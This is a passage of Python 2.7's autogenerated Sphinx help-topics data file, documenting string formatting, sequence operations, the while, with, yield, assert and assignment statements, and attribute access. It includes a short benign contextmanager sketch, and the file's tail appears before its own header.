If *format* is a\nUnicode object, or if any of the objects being converted using the\n"%s" conversion are Unicode objects, the result will also be a Unicode\nobject.\n\nIf *format* requires a single argument, *values* may be a single non-\ntuple object. [5] Otherwise, *values* must be a tuple with exactly\nthe number of items specified by the format string, or a single\nmapping object (for example, a dictionary).\n\nA conversion specifier contains two or more characters and has the\nfollowing components, which must occur in this order:\n\n1. The "\"%\"" character, which marks the start of the specifier.\n\n2. Mapping key (optional), consisting of a parenthesised sequence\n of characters (for example, "(somename)").\n\n3. Conversion flags (optional), which affect the result of some\n conversion types.\n\n4. Minimum field width (optional). If specified as an "\"*\""\n (asterisk), the actual width is read from the next element of the\n tuple in *values*, and the object to convert comes after the\n minimum field width and optional precision.\n\n5. Precision (optional), given as a "\".\"" (dot) followed by the\n precision. If specified as "\"*\"" (an asterisk), the actual precision\n is read from the next element of the tuple in *values*, and the\n value to convert comes after the precision.\n\n6. Length modifier (optional).\n\n7. Conversion type.\n\nWhen the right argument is a dictionary (or other mapping type), then\nthe formats in the string *must* include a parenthesised mapping key\ninto that dictionary inserted immediately after the "\"%\"" character.\nThe mapping key selects the value to be formatted from the mapping.\nFor example:\n\n>>> print \"%(language)s has %(number)03d quote types.\" % \\\n... {"language": "Python", "number": 2}\nPython has 002 quote types.\n\nIn this case no "*" specifiers may occur in a format (since they\nrequire a sequential parameter list).\n\nThe conversion flag characters are:\n\n+-----------+-----------------------------------------------------------------------+\n| Flag | Meaning |\n+===========+=======================================================================+\n| "\'#\'" | The value conversion will use the "alternate form" (where defined |\n| | below). |\n+-----------+-----------------------------------------------------------------------+\n| "\'0\'" | The conversion will be zero padded for numeric values. |\n+-----------+-----------------------------------------------------------------------+\n| "\'-\'" | The converted value is left adjusted (overrides the "\'0\'" conversion |\n| | if both are given). |\n+-----------+-----------------------------------------------------------------------+\n| "\' \'" | (a space) A blank should be left before a positive number (or empty |\n| | string) produced by a signed conversion. |\n+-----------+-----------------------------------------------------------------------+\n| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will precede the conversion |\n| | (overrides a "space" flag). |\n+-----------+-----------------------------------------------------------------------+\n\nA length modifier ("h", "l", or "L") may be present, but is ignored as\nit is not necessary for Python -- so e.g. "%ld" is identical to "%d".\n\nThe conversion types are:\n\n+--------------+-------------------------------------------------------+---------+\n| Conversion | Meaning | Notes |\n+==============+=======================================================+=========+\n| "\'d\'" | Signed integer decimal. 
| |\n+--------------+-------------------------------------------------------+---------+\n| "\'i\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'o\'" | Signed octal value. | (1) |\n+--------------+-------------------------------------------------------+---------+\n| "\'u\'" | Obsolete type -- it is identical to "\'d\'". | (7) |\n+--------------+-------------------------------------------------------+---------+\n| "\'x\'" | Signed hexadecimal (lowercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'X\'" | Signed hexadecimal (uppercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'e\'" | Floating point exponential format (lowercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'E\'" | Floating point exponential format (uppercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'f\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'F\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'g\'" | Floating point format. Uses lowercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'G\'" | Floating point format. Uses uppercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'c\'" | Single character (accepts integer or single character | |\n| | string). | |\n+--------------+-------------------------------------------------------+---------+\n| "\'r\'" | String (converts any Python object using repr()). | (5) |\n+--------------+-------------------------------------------------------+---------+\n| "\'s\'" | String (converts any Python object using "str()"). | (6) |\n+--------------+-------------------------------------------------------+---------+\n| "\'%\'" | No argument is converted, results in a "\'%\'" | |\n| | character in the result. | |\n+--------------+-------------------------------------------------------+---------+\n\nNotes:\n\n1. The alternate form causes a leading zero ("\'0\'") to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n2. The alternate form causes a leading "\'0x\'" or "\'0X\'" (depending\n on whether the "\'x\'" or "\'X\'" format was used) to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n3. The alternate form causes the result to always contain a decimal\n point, even if no digits follow it.\n\n The precision determines the number of digits after the decimal\n point and defaults to 6.\n\n4. The alternate form causes the result to always contain a decimal\n point, and trailing zeroes are not removed as they would otherwise\n be.\n\n The precision determines the number of significant digits before\n and after the decimal point and defaults to 6.\n\n5. 
The "%r" conversion was added in Python 2.0.\n\n The precision determines the maximal number of characters used.\n\n6. If the object or format provided is a "unicode" string, the\n resulting string will also be "unicode".\n\n The precision determines the maximal number of characters used.\n\n7. See **PEP 237**.\n\nSince Python strings have an explicit length, "%s" conversions do not\nassume that "\'\\0\'" is the end of the string.\n\nChanged in version 2.7: "%f" conversions for numbers whose absolute\nvalue is over 1e50 are no longer replaced by "%g" conversions.\n\nAdditional string operations are defined in standard modules "string"\nand "re".\n\n\nXRange Type\n===========\n\nThe "xrange" type is an immutable sequence which is commonly used for\nlooping. The advantage of the "xrange" type is that an "xrange"\nobject will always take the same amount of memory, no matter the size\nof the range it represents. There are no consistent performance\nadvantages.\n\nXRange objects have very little behavior: they only support indexing,\niteration, and the "len()" function.\n\n\nMutable Sequence Types\n======================\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, 
x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. 
A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'typesseq-mutable': u'\nMutable Sequence Types\n**********************\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return 
x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. 
**CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'unary': u'\nUnary arithmetic and bitwise operations\n***************************************\n\nAll unary arithmetic and bitwise operations have the same priority:\n\n u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n\nThe unary "-" (minus) operator yields the negation of its numeric\nargument.\n\nThe unary "+" (plus) operator yields its numeric argument unchanged.\n\nThe unary "~" (invert) operator yields the bitwise inversion of its\nplain or long integer argument. The bitwise inversion of "x" is\ndefined as "-(x+1)". It only applies to integral numbers.\n\nIn all three cases, if the argument does not have the proper type, a\n"TypeError" exception is raised.\n', 'while': u'\nThe "while" statement\n*********************\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n', 'with': u'\nThe "with" statement\n********************\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". 
Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'yield': u'\nThe "yield" statement\n*********************\n\n yield_stmt ::= yield_expression\n\nThe "yield" statement is only used when defining a generator function,\nand is only used in the body of the generator function. Using a\n"yield" statement in a function definition is sufficient to cause that\ndefinition to create a generator function instead of a normal\nfunction.\n\nWhen a generator function is called, it returns an iterator known as a\ngenerator iterator, or more commonly, a generator. The body of the\ngenerator function is executed by calling the generator\'s "next()"\nmethod repeatedly until it raises an exception.\n\nWhen a "yield" statement is executed, the state of the generator is\nfrozen and the value of "expression_list" is returned to "next()"\'s\ncaller. By "frozen" we mean that all local state is retained,\nincluding the current bindings of local variables, the instruction\npointer, and the internal evaluation stack: enough information is\nsaved so that the next time "next()" is invoked, the function can\nproceed exactly as if the "yield" statement were just another external\ncall.\n\nAs of Python version 2.5, the "yield" statement is now allowed in the\n"try" clause of a "try" ... "finally" construct. If the generator is\nnot resumed before it is finalized (by reaching a zero reference count\nor by being garbage collected), the generator-iterator\'s "close()"\nmethod will be called, allowing any pending "finally" clauses to\nexecute.\n\nFor full details of "yield" semantics, refer to the Yield expressions\nsection.\n\nNote: In Python 2.2, the "yield" statement was only allowed when the\n "generators" feature has been enabled. This "__future__" import\n statement was used to enable the feature:\n\n from __future__ import generators\n\nSee also:\n\n **PEP 0255** - Simple Generators\n The proposal for adding generators and the "yield" statement to\n Python.\n\n **PEP 0342** - Coroutines via Enhanced Generators\n The proposal that, among other generator enhancements, proposed\n allowing "yield" to appear inside a "try" ... "finally" block.\n'}
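# A minimal sketch, not part of the autogenerated data above, illustrating
# the "with" and "yield" semantics documented in the closing entries of the
# mapping just ended: "contextlib.contextmanager" turns a generator function
# into a context manager, so "__enter__()" runs the body up to the "yield"
# and binds the yielded value, while "__exit__()" resumes the generator so
# that pending "finally" clauses execute.  The names "managed" and "demo"
# are illustrative assumptions, not part of the documented API.
from contextlib import contextmanager

@contextmanager
def managed(tag):
    print('entering %s' % tag)      # runs during __enter__()
    try:
        yield tag                   # value bound by "with managed(...) as t"
    finally:
        print('exiting %s' % tag)   # pending finally runs during __exit__()

with managed('demo') as t:
    print('suite sees %r' % t)      # -> suite sees 'demo'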
# -*- coding: utf-8 -*-
# Autogenerated by Sphinx on Wed Jan 6 03:48:54 2016
topics = {'assert': u'\nThe "assert" statement\n**********************\n\nAssert statements are a convenient way to insert debugging assertions\ninto a program:\n\n assert_stmt ::= "assert" expression ["," expression]\n\nThe simple form, "assert expression", is equivalent to\n\n if __debug__:\n if not expression: raise AssertionError\n\nThe extended form, "assert expression1, expression2", is equivalent to\n\n if __debug__:\n if not expression1: raise AssertionError(expression2)\n\nThese equivalences assume that "__debug__" and "AssertionError" refer\nto the built-in variables with those names. In the current\nimplementation, the built-in variable "__debug__" is "True" under\nnormal circumstances, "False" when optimization is requested (command\nline option -O). The current code generator emits no code for an\nassert statement when optimization is requested at compile time. Note\nthat it is unnecessary to include the source code for the expression\nthat failed in the error message; it will be displayed as part of the\nstack trace.\n\nAssignments to "__debug__" are illegal. The value for the built-in\nvariable is determined when the interpreter starts.\n',
 'assignment': u'\nAssignment statements\n*********************\n\nAssignment statements are used to (re)bind names to values and to\nmodify attributes or items of mutable objects:\n\n assignment_stmt ::= (target_list "=")+ (expression_list | yield_expression)\n target_list ::= target ("," target)* [","]\n target ::= identifier\n | "(" target_list ")"\n | "[" target_list "]"\n | attributeref\n | subscription\n | slicing\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn assignment statement evaluates the expression list (remember that\nthis can be a single expression or a comma-separated list, the latter\nyielding a tuple) and assigns the single resulting object to each of\nthe target lists, from left to right.\n\nAssignment is defined recursively depending on the form of the target\n(list). When a target is part of a mutable object (an attribute\nreference, subscription or slicing), the mutable object must\nultimately perform the assignment and decide about its validity, and\nmay raise an exception if the assignment is unacceptable. The rules\nobserved by various types and the exceptions raised are given with the\ndefinition of the object types (see section The standard type\nhierarchy).\n\nAssignment of an object to a target list is recursively defined as\nfollows.\n\n* If the target list is a single target: The object is assigned to\n that target.\n\n* If the target list is a comma-separated list of targets: The\n object must be an iterable with the same number of items as there\n are targets in the target list, and the items are assigned, from\n left to right, to the corresponding targets.\n\nAssignment of an object to a single target is recursively defined as\nfollows.\n\n* If the target is an identifier (name):\n\n * If the name does not occur in a "global" statement in the\n current code block: the name is bound to the object in the current\n local namespace.\n\n * Otherwise: the name is bound to the object in the current global\n namespace.\n\n The name is rebound if it was already bound. 
This may cause the\n reference count for the object previously bound to the name to reach\n zero, causing the object to be deallocated and its destructor (if it\n has one) to be called.\n\n* If the target is a target list enclosed in parentheses or in\n square brackets: The object must be an iterable with the same number\n of items as there are targets in the target list, and its items are\n assigned, from left to right, to the corresponding targets.\n\n* If the target is an attribute reference: The primary expression in\n the reference is evaluated. It should yield an object with\n assignable attributes; if this is not the case, "TypeError" is\n raised. That object is then asked to assign the assigned object to\n the given attribute; if it cannot perform the assignment, it raises\n an exception (usually but not necessarily "AttributeError").\n\n Note: If the object is a class instance and the attribute reference\n occurs on both sides of the assignment operator, the RHS expression,\n "a.x" can access either an instance attribute or (if no instance\n attribute exists) a class attribute. The LHS target "a.x" is always\n set as an instance attribute, creating it if necessary. Thus, the\n two occurrences of "a.x" do not necessarily refer to the same\n attribute: if the RHS expression refers to a class attribute, the\n LHS creates a new instance attribute as the target of the\n assignment:\n\n class Cls:\n x = 3 # class variable\n inst = Cls()\n inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x as 3\n\n This description does not necessarily apply to descriptor\n attributes, such as properties created with "property()".\n\n* If the target is a subscription: The primary expression in the\n reference is evaluated. It should yield either a mutable sequence\n object (such as a list) or a mapping object (such as a dictionary).\n Next, the subscript expression is evaluated.\n\n If the primary is a mutable sequence object (such as a list), the\n subscript must yield a plain integer. If it is negative, the\n sequence\'s length is added to it. The resulting value must be a\n nonnegative integer less than the sequence\'s length, and the\n sequence is asked to assign the assigned object to its item with\n that index. If the index is out of range, "IndexError" is raised\n (assignment to a subscripted sequence cannot add new items to a\n list).\n\n If the primary is a mapping object (such as a dictionary), the\n subscript must have a type compatible with the mapping\'s key type,\n and the mapping is then asked to create a key/datum pair which maps\n the subscript to the assigned object. This can either replace an\n existing key/value pair with the same key value, or insert a new\n key/value pair (if no key with the same value existed).\n\n* If the target is a slicing: The primary expression in the\n reference is evaluated. It should yield a mutable sequence object\n (such as a list). The assigned object should be a sequence object\n of the same type. Next, the lower and upper bound expressions are\n evaluated, insofar they are present; defaults are zero and the\n sequence\'s length. The bounds should evaluate to (small) integers.\n If either bound is negative, the sequence\'s length is added to it.\n The resulting bounds are clipped to lie between zero and the\n sequence\'s length, inclusive. Finally, the sequence object is asked\n to replace the slice with the items of the assigned sequence. 
The\n length of the slice may be different from the length of the assigned\n sequence, thus changing the length of the target sequence, if the\n object allows it.\n\n**CPython implementation detail:** In the current implementation, the\nsyntax for targets is taken to be the same as for expressions, and\ninvalid syntax is rejected during the code generation phase, causing\nless detailed error messages.\n\nWARNING: Although the definition of assignment implies that overlaps\nbetween the left-hand side and the right-hand side are \'safe\' (for\nexample "a, b = b, a" swaps two variables), overlaps *within* the\ncollection of assigned-to variables are not safe! For instance, the\nfollowing program prints "[0, 2]":\n\n x = [0, 1]\n i = 0\n i, x[i] = 1, 2\n print x\n\n\nAugmented assignment statements\n===============================\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'atom-identifiers': u'\nIdentifiers (Names)\n*******************\n\nAn identifier occurring as an atom is a name. See section Identifiers\nand keywords for lexical definition and section Naming and binding for\ndocumentation of naming and binding.\n\nWhen the name is bound to an object, evaluation of the atom yields\nthat object. When a name is not bound, an attempt to evaluate it\nraises a "NameError" exception.\n\n**Private name mangling:** When an identifier that textually occurs in\na class definition begins with two or more underscore characters and\ndoes not end in two or more underscores, it is considered a *private\nname* of that class. Private names are transformed to a longer form\nbefore code is generated for them. The transformation inserts the\nclass name, with leading underscores removed and a single underscore\ninserted, in front of the name. 
For example, the identifier "__spam"\noccurring in a class named "Ham" will be transformed to "_Ham__spam".\nThis transformation is independent of the syntactical context in which\nthe identifier is used. If the transformed name is extremely long\n(longer than 255 characters), implementation defined truncation may\nhappen. If the class name consists only of underscores, no\ntransformation is done.\n', 'atom-literals': u"\nLiterals\n********\n\nPython supports string literals and various numeric literals:\n\n literal ::= stringliteral | integer | longinteger\n | floatnumber | imagnumber\n\nEvaluation of a literal yields an object of the given type (string,\ninteger, long integer, floating point number, complex number) with the\ngiven value. The value may be approximated in the case of floating\npoint and imaginary (complex) literals. See section Literals for\ndetails.\n\nAll literals correspond to immutable data types, and hence the\nobject's identity is less important than its value. Multiple\nevaluations of literals with the same value (either the same\noccurrence in the program text or a different occurrence) may obtain\nthe same object or a different object with the same value.\n", 'attribute-access': u'\nCustomizing attribute access\n****************************\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. 
